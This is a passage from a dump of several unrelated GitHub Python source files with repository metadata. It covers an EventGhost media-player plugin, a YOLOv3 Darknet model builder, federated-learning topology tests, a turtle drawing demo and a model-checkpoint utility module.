(clear)\",\n \"Top left\",\n \"Top right\",\n )\n\n\n def __call__(self, osd=\"\", dur=3, pos=1):\n if self.plugin.mpcHwnd is not None:\n osd = eg.ParseString(osd) + \"\\0\"\n OSDDATA.nMsgPos = pos\n OSDDATA.nDurationMS = 1000*dur\n OSDDATA.strMsg = osd.encode(eg.systemEncoding)\n cds = COPYDATASTRUCT()\n cds.dwData = CMD_OSDSHOWMESSAGE\n cds.cbData = sizeof(OSDDATA)\n cds.lpData = cast(addressof(OSDDATA), c_void_p)\n SendMessage(self.plugin.mpcHwnd, WM_COPYDATA, 0, addressof(cds))\n\n\n def Configure(self, osd=\"\", dur=3, pos=1):\n panel = eg.ConfigPanel()\n osdLabel = wx.StaticText(panel,-1,self.text.osdLabel)\n posLabel = wx.StaticText(panel,-1,self.text.posLabel)\n durLabel = wx.StaticText(panel,-1,self.text.durLabel)\n osdCtrl = wx.TextCtrl(panel,-1,osd, size=(200,-1))\n durCtrl = eg.SpinIntCtrl(panel, -1, dur, max=99999)\n posCtrl = wx.Choice(panel,-1,choices=self.text.position)\n posCtrl.SetSelection(pos)\n sizer = wx.FlexGridSizer(3, 2, 5, 10)\n sizer.Add(osdLabel,0,wx.TOP,3)\n sizer.Add(osdCtrl)\n sizer.Add(durLabel,0,wx.TOP,3)\n sizer.Add(durCtrl)\n sizer.Add(posLabel,0,wx.TOP,3)\n sizer.Add(posCtrl)\n panel.sizer.Add(sizer,0,wx.ALL|wx.EXPAND,20)\n\n while panel.Affirmed():\n panel.SetResult(\n osdCtrl.GetValue(),\n durCtrl.GetValue(),\n posCtrl.GetSelection(),\n )\n#===============================================================================\n\nACTIONS = (\n(eg.ActionGroup, 'GroupMainControls', 'Main controls', None, (\n (Run, \"Run\", \"Run MPC-HC\", \"Run MPC-HC with its default settings.\" ,None),\n ('Exit', 'Quit Application', None, 816),\n ('PlayPause', 'Play/Pause', None, 889),\n ('Play', 'Play', None, 887),\n ('Pause', 'Pause', None, 888),\n ('Stop', 'Stop', None, 890),\n ('JumpForwardSmall', 'Jump Forward Small', None, 900),\n ('JumpBackwardSmall', 'Jump Backward Small', None, 899),\n ('JumpForwardMedium', 'Jump Forward Medium', None, 902),\n ('JumpBackwardMedium', 'Jump Backward Medium', None, 901),\n ('JumpForwardLarge', 'Jump Forward Large', None, 904),\n ('JumpBackwardLarge', 'Jump Backward Large', None, 903),\n ('JumpForwardKeyframe', 'Jump Forward Keyframe', None, 898),\n ('JumpBackwardKeyframe', 'Jump Backward Keyframe', None, 897),\n (\n SetInteger,\n \"Jump\",\n \"Jump forward/backward of N seconds\",\n \"Jumps forward/backward of N seconds.\",\n (CMD_JUMPOFNSECONDS,0,-99999,99999)\n ),\n (\n SetInteger,\n \"SetPosition\",\n \"Cue current file to specific position\",\n \"Cues current file to specific position.\",\n (CMD_SETPOSITION,1,1,999999)\n ), ('IncreaseRate', 'Increase Rate', None, 895),\n ('DecreaseRate', 'Decrease Rate', None, 894),\n ('ResetRate', 'Reset Rate', None, 896),\n ('VolumeUp', 'Volume Up', None, 907),\n ('VolumeDown', 'Volume Down', None, 908),\n ('VolumeMute', 'Volume Mute', None, 909),\n ('BossKey', 'Boss Key', None, 944),\n ('Next', 'Next', None, 922),\n ('Previous', 'Previous', None, 921),\n (SendCmd,\"StartPlaylist\",\"Start playing playlist\",\"Starts playing playlist.\",CMD_STARTPLAYLIST),\n (SendCmd,\"ClearPlaylist\",\"Remove all files from playlist\",\"Removes all files from playlist.\",CMD_CLEARPLAYLIST),\n ('NextPlaylistItem', 'Next Playlist Item', None, 920),\n ('PreviousPlaylistItem', 'Previous Playlist Item', None, 919),\n (OpenFile,\"AddFile\",\"Add file to playlist\",\"Add a new file to playlist (did not start playing).\",CMD_ADDTOPLAYLIST),\n #(\n # SetInteger,\n # \"SetActiveFile\",\n # \"Set the active file in the playlist\",\n # \"Sets the active file in the playlist.\",\n # (CMD_SETINDEXPLAYLIST,4,-1,9)\n #),\n ('OpenDVD', 'Open DVD', None, 801),\n ('OpenFileDialog', 'Show dialog \"Open file\"', None, 800),\n (OpenFile,\"OpenFile\",\"Open file\",\"Opens file.\",CMD_OPENFILE),\n ('QuickOpen', 'Quick Open File', None, 969),\n ('OpenDirectory', 'Open Directory', None, 33208),\n ('FrameStep', 'Frame Step', None, 891),\n ('FrameStepBack', 'Frame Step Back', None, 892),\n ('GoTo', 'Go To', None, 893),\n ('AudioDelayAdd10ms', 'Audio Delay +10ms', None, 905),\n ('AudioDelaySub10ms', 'Audio Delay -10ms', None, 906),\n (\n SetInteger,\n \"SetAudioDelay\",\n \"Set the audio delay\",\n \"Sets the audio delay.\",\n (CMD_SETAUDIODELAY,5,-999999,999999)\n ),\n)),\n(eg.ActionGroup, 'GroupViewModes', 'View modes', None, (\n ('Fullscreen', 'Fullscreen', None, 830),\n ('FullscreenWOR', 'Fullscreen without resolution change', None, 831),\n ('PnSIncSize', 'Pan & Scan Increase Size', None, 862),\n ('PnSDecSize', 'Pan & Scan Decrease Size', None, 863),\n ('PnSTo169', 'Pan & Scan Scale to 16:9', None, 4100),\n ('PnSToWidescreen', 'Pan & Scan to Widescreen', None, 4101),\n ('PnSToUltraWidescreen', 'Pan & Scan to Ultra-Widescreen', None, 4102),\n ('ViewMinimal', 'View Minimal', None, 827),\n ('ViewCompact', 'View Compact', None, 828),\n ('ViewNormal', 'View Normal', None, 829),\n ('AlwaysOnTop', 'Always On Top', None, 884),\n ('Zoom50', 'Zoom 50%', None, 832),\n ('Zoom100', 'Zoom 100%', None, 833),\n ('Zoom200', 'Zoom 200%', None, 834),\n ('VidFrmHalf', 'Video Frame Half', None, 835),\n ('VidFrmNormal', 'Video Frame Normal', None, 836),\n ('VidFrmDouble', 'Video Frame Double', None, 837),\n ('VidFrmStretch', 'Video Frame Stretch', None, 838),\n ('VidFrmInside', 'Video Frame Inside', None, 839),\n ('VidFrmOutside', 'Video Frame Outside', None, 840),\n ('PnSReset', 'Pan & Scan Reset', None, 861),\n ('PnSIncWidth', 'Pan & Scan Increase Width', None, 864),\n ('PnSIncHeight', 'Pan & Scan Increase Height', None, 866),\n ('PnSDecWidth', 'Pan & Scan Decrease Width', None, 865),\n ('PnSDecHeight', 'Pan & Scan Decrease Height', None, 867),\n ('PnSCenter', 'Pan & Scan Center', None, 876),\n ('PnSLeft', 'Pan & Scan Left', None, 868),\n ('PnSRight', 'Pan & Scan Right', None, 869),\n ('PnSUp', 'Pan & Scan Up', None, 870),\n ('PnSDown', 'Pan & Scan Down', None, 871),\n ('PnSUpLeft', 'Pan & Scan Up/Left', None, 872),\n ('PnSUpRight', 'Pan & Scan Up/Right', None, 873),\n ('PnSDownLeft', 'Pan & Scan Down/Left', None, 874),\n ('PnSDownRight', 'Pan & Scan Down/Right', None, 875),\n ('PnSRotateAddX', 'Pan & Scan Rotate X+', None, 877),\n ('PnSRotateSubX', 'Pan & Scan Rotate X-', None, 878),\n ('PnSRotateAddY', 'Pan & Scan Rotate Y+', None, 879),\n ('PnsRotateSubY', 'Pan & Scan Rotate Y-', None, 880),\n ('PnSRotateAddZ', 'Pan & Scan Rotate Z+', None, 881),\n ('PnSRotateSubZ', 'Pan & Scan Rotate Z-', None, 882),\n)),\n(eg.ActionGroup, 'GroupDvdControls', 'DVD controls', None, (\n ('DVDTitleMenu', 'DVD Title Menu', None, 923),\n ('DVDRootMenu', 'DVD Root Menu', None, 924),\n ('DVDSubtitleMenu', 'DVD Subtitle Menu', None, 925),\n ('DVDAudioMenu', 'DVD Audio Menu', None, 926),\n ('DVDAngleMenu', 'DVD Angle Menu', None, 927),\n ('DVDChapterMenu', 'DVD Chapter Menu', None, 928),\n ('DVDMenuLeft', 'DVD Menu Left', None, 929),\n ('DVDMenuRight', 'DVD Menu Right', None, 930),\n ('DVDMenuUp', 'DVD Menu Up', None, 931),\n ('DVDMenuDown', 'DVD Menu Down', None, 932),\n ('DVDMenuActivate', 'DVD Menu Activate', None, 933),\n ('DVDMenuBack', 'DVD Menu Back', None, 934),\n ('DVDMenuLeave', 'DVD Menu Leave', None, 935),\n ('DVDNextAngle', 'DVD Next Angle', None, 961),\n ('DVDPrevAngle', 'DVD Previous Angle', None, 962),\n ('DVDNextAudio', 'DVD Next Audio', None, 963),\n ('DVDPrevAudio', 'DVD Prev Audio', None, 964),\n ('DVDNextSubtitle', 'DVD Next Subtitle', None, 965),\n ('DVDPrevSubtitle', 'DVD Prev Subtitle', None, 966),\n ('DVDOnOffSubtitle', 'DVD On/Off Subtitle', None, 967),\n)),\n(eg.ActionGroup, 'GroupExtendedControls', 'Extended controls', None, (\n ('OpenDevice', 'Open Device', None, 802),\n ('SaveAs', 'Save As', None, 805),\n ('SaveImage', 'Save Image', None, 806),\n ('SaveImageAuto', 'Save Image Auto', None, 807),\n ('LoadSubTitle', 'Load Subtitle', None, 809),\n ('SaveSubtitle', 'Save Subtitle', None, 810),\n ('Close', 'Close File', None, 804),\n ('Properties', 'Properties', None, 814),\n ('PlayerMenuShort', 'Player Menu Short', None, 949),\n ('PlayerMenuLong', 'Player Menu Long', None, 950),\n ('FiltersMenu', 'Filters Menu', None, 951),\n ('Options', 'Options', None, 815),\n ('NextAudio', 'Next Audio', None, 952),\n ('PrevAudio', 'Previous Audio', None, 953),\n (\n SetInteger,\n \"SetAudioTrack\",\n \"Set the audio track\",\n \"Sets the audio track.\",\n (CMD_SETAUDIOTRACK,2,0,9)\n ),\n ('NextSubtitle', 'Next Subtitle', None, 954),\n ('PrevSubtitle', 'Prev Subtitle', None, 955),\n (\n SetInteger,\n \"SetSubtitlesTrack\",\n \"Set the subtitle track\",\n \"Sets the subtitle track.\",\n (CMD_SETSUBTITLETRACK,3,-1,9)\n ),\n ('OnOffSubtitle', 'On/Off Subtitle', None, 956),\n ('GotoNextSubtitle', 'Goto Next Subtitle', None, 32781),\n ('GotoPrevSubtitle', 'Goto Prev Subtitle', None, 32780),\n ('SubtitleDelayMinus', 'Subtitle Delay -', None, 24000),\n ('SubtitleDelayPlus', 'Subtitle Delay +', None, 24001),\n (\n SetInteger,\n \"SetSubtitleDelay\",\n \"Set the subtitle delay\",\n \"Sets the subtitle delay.\",\n (CMD_SETSUBTITLEDELAY,6,-999999,999999)\n ),\n ('ReloadSubtitles', 'Reload Subtitles', None, 2302),\n ('NextAudioOGM', 'Next Audio OGM', None, 957),\n ('PrevAudioOGM', 'Previous Audio OGM', None, 958),\n ('NextSubtitleOGM', 'Next Subtitle OGM', None, 959),\n ('PrevSubtitleOGM', 'Previous Subtitle OGM', None, 960),\n (ShowMenu,'ShowMenu','Show MPC menu','Show MPC menu.', None),\n (GoTo_OSD,'GoTo_OSD','On Screen Go To ...','Show On Screen \"Go To ...\".', None),\n (SendOSD,\"SendOSD\",\"Show custom OSD\",\"Shows custom OSD.\",None),\n (AfterPlaybackOnce,\"AfterPlaybackOnce\",\"Action after playback (once)\",\"The selected action will be made after playback (once).\", None),\n (AfterPlayback,\"AfterPlayback\",\"Action after playback (every time)\",\"The selected action will be made after playback (every time).\", None),\n (UserMessage,'UserMessage',\"Send user's message\",UserMessage.description, None),\n)),\n(eg.ActionGroup, 'GroupToggleControls', 'Toggle player controls', None, (\n ('ToggleCaptionMenu', 'Toggle Caption Menu', None, 817),\n ('ToggleSeeker', 'Toggle Seeker', None, 818),\n ('ToggleControls', 'Toggle Controls', None, 819),\n ('ToggleInformation', 'Toggle Information', None, 820),\n ('ToggleStatistics', 'Toggle Statistics', None, 821),\n ('ToggleStatus', 'Toggle Status', None, 822),\n ('ToggleSubresyncBar', 'Toggle Subresync Bar', None, 823),\n ('TogglePlaylistBar', 'Toggle Playlist Bar', None, 824),\n ('ToggleCaptureBar', 'Toggle Capture Bar', None, 825),\n (SendCmd,\"ShaderToggle\",\"Toggle shader\",\"Toggles shader.\",CMD_SHADER_TOGGLE),\n ('ToggleShaderEditorBar', 'Toggle Shader Editor Bar', None, 826),\n ('ToggleElapsedTime', 'Toggle OSD Elapsed Time', None, 32778),\n)),\n(eg.ActionGroup, 'VariousInformationRetrieval',\"Retrieve various information\", None, (\n (GetWindowState,'GetWindowState','Get window state','Gets window state.', None),\n (GetNowPlaying,'GetNowPlaying','Get currently playing file','Gets currently playing file.', None),\n (GetTimes,'GetTimes','Get Times','Returns elapsed, remaining and total times.', None),\n (GetPosition,\"GetPosition\",\"Get current position\",\"Returns current position.\",None),\n (GetInfo,\"GetSubtitles\",\"Get subtitles tracks\",\"Asks for a list of the subtitles tracks of the file.\",CMD_GETSUBTITLETRACKS),\n (GetInfo,\"GetAdiotracks\",\"Get audio tracks\",\"Asks for a list of the audio tracks of the file.\",CMD_GETAUDIOTRACKS),\n (GetInfo,\"GetPlaylist\",\"Get playlist\",\"Asks for the current playlist.\",CMD_GETPLAYLIST),\n (GetPlayState,\"GetPlaystate\",\"Get play-state\",\"Returns current play-state.\",None),\n)),\n)\n#===============================================================================\n\n","repo_name":"EventGhost/EventGhost","sub_path":"plugins/MediaPlayerClassic/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":103419,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"31"} +{"seq_id":"41337139130","text":"import torch \nimport torch.nn as nn \nimport torch.nn.functional as F \nfrom torch.autograd import Variable\nimport numpy as np\nfrom util import predict_transform\n\ndef parse_cfg(cfgfile):\n \"\"\"\n 解析网络结构的cfg文件\n\n 返回一个包含网络结构的字典列表,每个字典表示网络结构中的一个块。\n \"\"\"\n # 读取cfg文件\n file = open(cfgfile,\"r\")\n lines = file.read().split(\"\\n\")\n lines = [x for x in lines if len(x) > 0] # empty lines\n lines = [x for x in lines if x[0] != \"#\"] # comments\n lines = [x.rstrip().lstrip() for x in lines] # whitespaces\n\n block = {}\n blocks = []\n\n for line in lines:\n if line[0] == \"[\": # 一个block的开始,也意味着上一个block的结束\n if len(block) != 0:\n blocks.append(block) # 上一个block解析完成,添加\n block = {}\n block[\"type\"] = line[1:-1].rstrip()\n else:\n key,value = line.split(\"=\")\n block[key.rstrip()] = value.lstrip()\n blocks.append(block)\n\n return blocks\n\n\nclass EmptyLayer(nn.Module):\n \"\"\"\n 为shortcut layer / route layer准备,具体功能不在此实现,在模型的forward中\n \"\"\"\n def __init__(self):\n super(EmptyLayer,self).__init__()\n\nclass DetectionLayer(nn.Module):\n \"\"\"\n 检测层的具体实现,在特征图上使用anchor预测目标区域和类别,\n 此功能在predict_transform中实现\n \"\"\"\n def __init__(self,anchors):\n super(DetectionLayer,self).__init__()\n self.anchors = anchors\n\ndef create_modules(blocks):\n net_info = blocks[0] # 第一个block是关于网络训练的一些配置信息\n\n module_list = nn.ModuleList()\n prev_filters = 3\n output_filters = []\n\n for index,x in enumerate(blocks[1:]):\n module = nn.Sequential()\n\n if (x[\"type\"] == \"convolutional\"):\n activation = x[\"activation\"] # 激活函数\n # 是否进行BN\n try:\n batch_normalize = int(x[\"batch_normalize\"])\n bias = False\n except:\n batch_normalize = 0\n bias = True \n filters = int(x[\"filters\"]) # 卷积个数\n padding = int(x[\"pad\"]) # 是否进行padding\n kernel_size = int(x[\"size\"]) # 卷积核大小\n stride = int(x[\"stride\"]) # 卷积步长\n\n if padding:\n pad = (kernel_size - 1) // 2 # padding的宽度,保持feature map大小不变\n else:\n pad = 0\n \n # 创建卷积层\n conv = nn.Conv2d(prev_filters,filters,kernel_size,stride,\n pad,bias=bias)\n module.add_module(\"conv_{}\".format(index),conv)\n\n # BN\n if batch_normalize:\n bn = nn.BatchNorm2d(filters)\n module.add_module(\"batch_norm_{}\".format(index),bn)\n\n # activation\n if activation == \"leaky\":\n activn = nn.LeakyReLU(0.1,inplace=True)\n module.add_module(\"leaky_{}\".format(index),activn)\n \n # an upsampling layer\n elif (x[\"type\"] == \"upsample\"):\n stride = int(x[\"stride\"])\n upsample = nn.Upsample(scale_factor=2,mode=\"bilinear\")\n module.add_module(\"upsample_{}\".format(index),upsample)\n\n # a route layer\n # route layer的作用,当layer的取值为正时,输出这个正数对应层的特征\n # 当layer的取值为负的时候,输出route层向后退layer层对应的\n elif (x[\"type\"] == \"route\"):\n x[\"layers\"] = x[\"layers\"].split(\",\")\n\n start = int(x[\"layers\"][0])\n\n try:\n end = int(x[\"layers\"][1])\n except:\n end = 0\n\n if start > 0:\n start = start - index \n if end > 0:\n end = end - index\n route = EmptyLayer()\n module.add_module(\"route_{}\".format(index),route)\n\n if end < 0:\n filters = output_filters[index + start] + output_filters[index + end]\n else:\n filters = output_filters[index + start]\n\n # shortcut layer\n elif (x[\"type\"] == \"shortcut\"):\n shortcut = EmptyLayer()\n module.add_module(\"shortcut_{}\".format(index),shortcut)\n\n # yolo is the detection layer\n elif (x[\"type\"] == \"yolo\"):\n mask = x[\"mask\"].split(\",\")\n mask = [int(x) for x in mask]\n\n anchors = x[\"anchors\"].split(\",\")\n anchors = [int(a) for a in anchors]\n anchors = [(anchors[i],anchors[i+1]) for i in range(0,len(anchors),2)]\n anchors = [anchors[i] for i in mask]\n\n detection = DetectionLayer(anchors)\n module.add_module(\"Detecion_{}\".format(index),detection)\n \n module_list.append(module)\n prev_filters = filters\n output_filters.append(filters)\n\n return (net_info,module_list)\n\nclass Darknet(nn.Module):\n def __init__(self,cfgfile):\n super(Darknet,self).__init__()\n self.blocks = parse_cfg(cfgfile)\n self.net_info,self.module_list = create_modules(self.blocks)\n\n def forward(self,x,CUDA):\n modules = self.blocks[1:]\n outputs = {} \n \n write = 0\n for i,module in enumerate(modules):\n module_type = (module[\"type\"])\n\n if module_type == \"convolutional\" or module_type == \"upsample\":\n x = self.module_list[i](x) # forward\n elif module_type == \"route\":\n layers = module[\"layers\"]\n layers = [int(a) for a in layers]\n\n if layers[0] > 0:\n layers[0] = layers[0] - i\n\n if len(layers) == 1:\n x = outputs[i + layers[0]]\n else:\n if layers[1] > 0:\n layers[1] = layers[1] - i\n map1 = outputs[i + layers[0]]\n map2 = outputs[i + layers[1]]\n x = torch.cat((map1,map2),1)\n elif module_type == \"shortcut\":\n form_ = int(module[\"from\"])\n x = outputs[i-1] + outputs[i + form_] # 求和\n\n elif module_type == \"yolo\":\n \n anchors = self.module_list[i][0].anchors\n\n inp_dim = int(self.net_info[\"height\"])\n num_classes = int(module[\"classes\"])\n\n x = x.data # 得到yolo层的feature map\n x = predict_transform(x,inp_dim,anchors,num_classes,CUDA)\n\n if not write:\n detections = x \n write = 1 \n else:\n detections = torch.cat((detections,x),1)\n outputs[i] = x\n return detections\n\nif __name__ == \"__main__\":\n blocks = parse_cfg(\"yolov3.cfg\")\n print(create_modules(blocks))","repo_name":"brookicv/PyTorch-practices","sub_path":"yolov3/darknet.py","file_name":"darknet.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73515272409","text":"import json\n\nfrom fedstellar.utils.topologymanager import TopologyManager\n\n\n# set_test_settings()\n\ndef test_topology():\n topologymanager = TopologyManager(n_nodes=4, b_symmetric=True,\n undirected_neighbor_num=3)\n topologymanager.generate_topology()\n topology = topologymanager.get_topology()\n topologymanager.draw_graph()\n print(\"\\n\")\n print(topology)\n\n\ndef test_topology_6():\n topologymanager = TopologyManager(n_nodes=6, b_symmetric=True,\n undirected_neighbor_num=5)\n topologymanager.generate_topology()\n topology = topologymanager.get_topology()\n topologymanager.draw_graph()\n print(\"\\n\")\n print(topology)\n\n\ndef test_ring_topology():\n topologymanager = TopologyManager(scenario_name=\"example\", n_nodes=5, b_symmetric=True)\n topologymanager.generate_ring_topology()\n topology = topologymanager.get_topology()\n topologymanager.draw_graph()\n print(\"\\n\")\n print(topology)\n\n\ndef test_ring_topology2():\n # Import configuration file\n with open(\"/fedstellar/config/topology.json.example\") as json_file:\n config = json.load(json_file)\n n_nodes = len(config['nodes'])\n\n # Create a partially connected network (ring-structured network)\n topologymanager = TopologyManager(n_nodes=n_nodes, b_symmetric=True)\n topologymanager.generate_ring_topology()\n topology = topologymanager.get_topology()\n print(topology)\n\n nodes_ip_port = []\n for i in config['nodes']:\n nodes_ip_port.append((i['ip'], i['port']))\n\n topologymanager.add_nodes(nodes_ip_port)\n topologymanager.draw_graph()\n\ndef test_topology_centralized():\n\n # Create a partially connected network (ring-structured network)\n topologymanager = TopologyManager(n_nodes=5, b_symmetric=True, server=True)\n topologymanager.generate_topology()\n topology = topologymanager.get_topology()\n print(topology)\n topologymanager.draw_graph()\n","repo_name":"enriquetomasmb/fedstellar","sub_path":"test/topologymanager_test.py","file_name":"topologymanager_test.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"74273453207","text":"\"\"\"\nAuthor: Leo Vidarte \n\nThis is free software,\nyou can redistribute it and/or modify it\nunder the terms of the GPL version 3\nas published by the Free Software Foundation.\n\n\"\"\"\n\nimport random\nimport turtle\nfrom colores import colores\n\nrandom.shuffle(colores)\n\n\nWIDTH = 800\nHEIGHT = 600\n\n\ndef dibujar_circulo(event):\n radio = random.randint(10, 100)\n x = -(WIDTH/2) + event.x\n y = (HEIGHT/2) - event.y\n\n turtle.penup()\n turtle.setpos(x, y)\n turtle.right(90)\n turtle.fd(radio)\n turtle.left(90)\n turtle.pendown()\n\n turtle.color(colores.pop())\n turtle.begin_fill()\n turtle.circle(radio)\n turtle.end_fill()\n\n\nif __name__ == '__main__':\n\n turtle.setup(WIDTH, HEIGHT)\n turtle.title('Circulos')\n turtle.speed(0)\n turtle.hideturtle()\n\n screen = turtle.Screen()\n screen._root.bind('', dibujar_circulo)\n\n turtle.mainloop()\n","repo_name":"lvidarte/logo","sub_path":"circulos.py","file_name":"circulos.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35342261620","text":"import glob\nimport os\nfrom typing import (\n Dict,\n List,\n Optional,\n Union,\n)\n\nimport cv2\nimport numpy as np\nfrom scipy import interpolate\nimport torch\nfrom timm.models.vision_transformer import resize_pos_embed\nimport wandb\n\nfrom habitat.utils.visualizations.utils import (\n images_to_video,\n draw_collision,\n tile_images,\n)\nfrom habitat.utils.visualizations import maps\n\nfrom lmnav.emb_transfer.models.resnet_gn import ResNet\nfrom lmnav.emb_transfer.models.vit import VisionTransformer\n\n\ndef load_encoder(encoder, path):\n assert os.path.exists(path)\n if isinstance(encoder.backbone, ResNet):\n state_dict = torch.load(path, map_location=\"cpu\")[\"teacher\"]\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n return encoder.load_state_dict(state_dict=state_dict, strict=False)\n elif isinstance(encoder.backbone, VisionTransformer):\n model = encoder.backbone\n state_dict = torch.load(path, map_location=\"cpu\")[\"model\"]\n if state_dict[\"pos_embed\"].shape != model.pos_embed.shape:\n state_dict[\"pos_embed\"] = resize_pos_embed(\n state_dict[\"pos_embed\"],\n model.pos_embed,\n getattr(model, \"num_tokens\", 1),\n model.patch_embed.grid_size,\n )\n return model.load_state_dict(state_dict=state_dict, strict=False)\n elif isinstance(encoder.backbone, Beit):\n model = encoder.backbone\n state_dict = torch.load(path, map_location=\"cpu\")[\"model\"]\n return load_data2vec(state_dict, model)\n else:\n raise ValueError(\"unknown encoder backbone\")\n\n\ndef load_data2vec(checkpoint_model, model):\n state_dict = model.state_dict()\n for k in ['head.weight', 'head.bias']:\n if k in checkpoint_model and checkpoint_model[k].shape != state_dict[k].shape:\n print(f\"Removing key {k} from pretrained checkpoint\")\n del checkpoint_model[k]\n\n if model.use_rel_pos_bias and \"rel_pos_bias.relative_position_bias_table\" in checkpoint_model:\n print(\"Expand the shared relative position embedding to each transformer block. \")\n num_layers = model.get_num_layers()\n rel_pos_bias = checkpoint_model[\"rel_pos_bias.relative_position_bias_table\"]\n for i in range(num_layers):\n checkpoint_model[\"blocks.%d.attn.relative_position_bias_table\" % i] = rel_pos_bias.clone()\n\n checkpoint_model.pop(\"rel_pos_bias.relative_position_bias_table\")\n\n all_keys = list(checkpoint_model.keys())\n for key in all_keys:\n if \"relative_position_index\" in key:\n checkpoint_model.pop(key)\n\n if \"relative_position_bias_table\" in key:\n rel_pos_bias = checkpoint_model[key]\n src_num_pos, num_attn_heads = rel_pos_bias.size()\n dst_num_pos, _ = model.state_dict()[key].size()\n dst_patch_shape = model.patch_embed.grid_size\n if dst_patch_shape[0] != dst_patch_shape[1]:\n raise NotImplementedError()\n num_extra_tokens = dst_num_pos - (dst_patch_shape[0] * 2 - 1) * (dst_patch_shape[1] * 2 - 1)\n src_size = int((src_num_pos - num_extra_tokens) ** 0.5)\n dst_size = int((dst_num_pos - num_extra_tokens) ** 0.5)\n if src_size != dst_size:\n print(\"Position interpolate for %s from %dx%d to %dx%d\" % (\n key, src_size, src_size, dst_size, dst_size))\n extra_tokens = rel_pos_bias[-num_extra_tokens:, :]\n rel_pos_bias = rel_pos_bias[:-num_extra_tokens, :]\n\n def geometric_progression(a, r, n):\n return a * (1.0 - r ** n) / (1.0 - r)\n\n left, right = 1.01, 1.5\n while right - left > 1e-6:\n q = (left + right) / 2.0\n gp = geometric_progression(1, q, src_size // 2)\n if gp > dst_size // 2:\n right = q\n else:\n left = q\n\n # if q > 1.090307:\n # q = 1.090307\n\n dis = []\n cur = 1\n for i in range(src_size // 2):\n dis.append(cur)\n cur += q ** (i + 1)\n\n r_ids = [-_ for _ in reversed(dis)]\n\n x = r_ids + [0] + dis\n y = r_ids + [0] + dis\n\n t = dst_size // 2.0\n dx = np.arange(-t, t + 0.1, 1.0)\n dy = np.arange(-t, t + 0.1, 1.0)\n\n print(\"Original positions = %s\" % str(x))\n print(\"Target positions = %s\" % str(dx))\n\n all_rel_pos_bias = []\n\n for i in range(num_attn_heads):\n z = rel_pos_bias[:, i].view(src_size, src_size).float().numpy()\n f = interpolate.interp2d(x, y, z, kind='cubic')\n all_rel_pos_bias.append(\n torch.Tensor(f(dx, dy)).contiguous().view(-1, 1).to(rel_pos_bias.device))\n\n rel_pos_bias = torch.cat(all_rel_pos_bias, dim=-1)\n\n new_rel_pos_bias = torch.cat((rel_pos_bias, extra_tokens), dim=0)\n checkpoint_model[key] = new_rel_pos_bias\n\n # interpolate position embedding\n if 'pos_embed' in checkpoint_model:\n pos_embed_checkpoint = checkpoint_model['pos_embed']\n embedding_size = pos_embed_checkpoint.shape[-1]\n num_patches = model.patch_embed.num_patches\n num_extra_tokens = model.pos_embed.shape[-2] - num_patches\n # height (== width) for the checkpoint position embedding\n orig_size = int((pos_embed_checkpoint.shape[-2] - num_extra_tokens) ** 0.5)\n # height (== width) for the new position embedding\n new_size = int(num_patches ** 0.5)\n # class_token and dist_token are kept unchanged\n if orig_size != new_size:\n print(\"Position interpolate from %dx%d to %dx%d\" % (orig_size, orig_size, new_size, new_size))\n extra_tokens = pos_embed_checkpoint[:, :num_extra_tokens]\n # only the position tokens are interpolated\n pos_tokens = pos_embed_checkpoint[:, num_extra_tokens:]\n pos_tokens = pos_tokens.reshape(-1, orig_size, orig_size, embedding_size).permute(0, 3, 1, 2)\n pos_tokens = torch.nn.functional.interpolate(\n pos_tokens, size=(new_size, new_size), mode='bicubic', align_corners=False)\n pos_tokens = pos_tokens.permute(0, 2, 3, 1).flatten(1, 2)\n new_pos_embed = torch.cat((extra_tokens, pos_tokens), dim=1)\n checkpoint_model['pos_embed'] = new_pos_embed\n\n return model.load_state_dict(checkpoint_model, strict=False)\n\n\ndef setup_wandb(config, train, project_name=\"imagenav\"):\n if train:\n file_name = \"wandb_id.txt\"\n project_name = project_name + \"_training\"\n run_name = config.WANDB_NAME + \"_\" + str(config.TASK_CONFIG.SEED)\n else:\n file_name = \"wandb_id_eval_\" + str(config.EVAL.SPLIT) + \".txt\"\n project_name = project_name + \"_testing\"\n ckpt_str = \"_\"\n if os.path.isfile(config.EVAL_CKPT_PATH_DIR):\n ckpt_str = \"_\" + config.EVAL_CKPT_PATH_DIR.split(\"/\")[-1].split(\".\")[1] + \"_\"\n run_name = config.WANDB_NAME + \"_\" + str(config.EVAL.SPLIT) + ckpt_str + \\\n str(config.TASK_CONFIG.SEED)\n\n wandb_filepath = os.path.join(config.TENSORBOARD_DIR, file_name)\n\n # If file exists, then we are resuming from a previous eval\n if os.path.exists(wandb_filepath):\n with open(wandb_filepath, 'r') as file:\n wandb_id = file.read().rstrip('\\n')\n\n wandb.init(\n group=config.WANDB_NAME,\n job_type=str(config.TASK_CONFIG.SEED),\n id=wandb_id,\n project=project_name,\n config=config,\n mode=config.WANDB_MODE,\n resume='allow'\n )\n\n else:\n wandb_id = wandb.util.generate_id()\n\n with open(wandb_filepath, 'w') as file:\n file.write(wandb_id)\n\n wandb.init(\n group=config.WANDB_NAME,\n job_type=str(config.TASK_CONFIG.SEED),\n id=wandb_id,\n project=project_name,\n config=config,\n mode=config.WANDB_MODE\n )\n\n wandb.run.name = run_name\n wandb.run.save()\n\n\ndef poll_checkpoint_folder(\n checkpoint_folder: str, previous_ckpt_ind: int, suggested_interval: int, max_ckpts: int\n) -> Optional[str]:\n r\"\"\"Return (previous_ckpt_ind + 1)th checkpoint in checkpoint folder\n (sorted by time of last modification).\n Args:\n checkpoint_folder: directory to look for checkpoints.\n previous_ckpt_ind: index of checkpoint last returned.\n Returns:\n return checkpoint path if (previous_ckpt_ind + 1)th checkpoint is found\n else return None.\n \"\"\"\n assert os.path.isdir(checkpoint_folder), (\n f\"invalid checkpoint folder \" f\"path {checkpoint_folder}\"\n )\n models_paths = list(\n filter(os.path.isfile, glob.glob(checkpoint_folder + \"/*\"))\n )\n\n models_paths.sort(key=os.path.getmtime)\n\n if previous_ckpt_ind == -1:\n ind = 0\n else:\n ind = previous_ckpt_ind 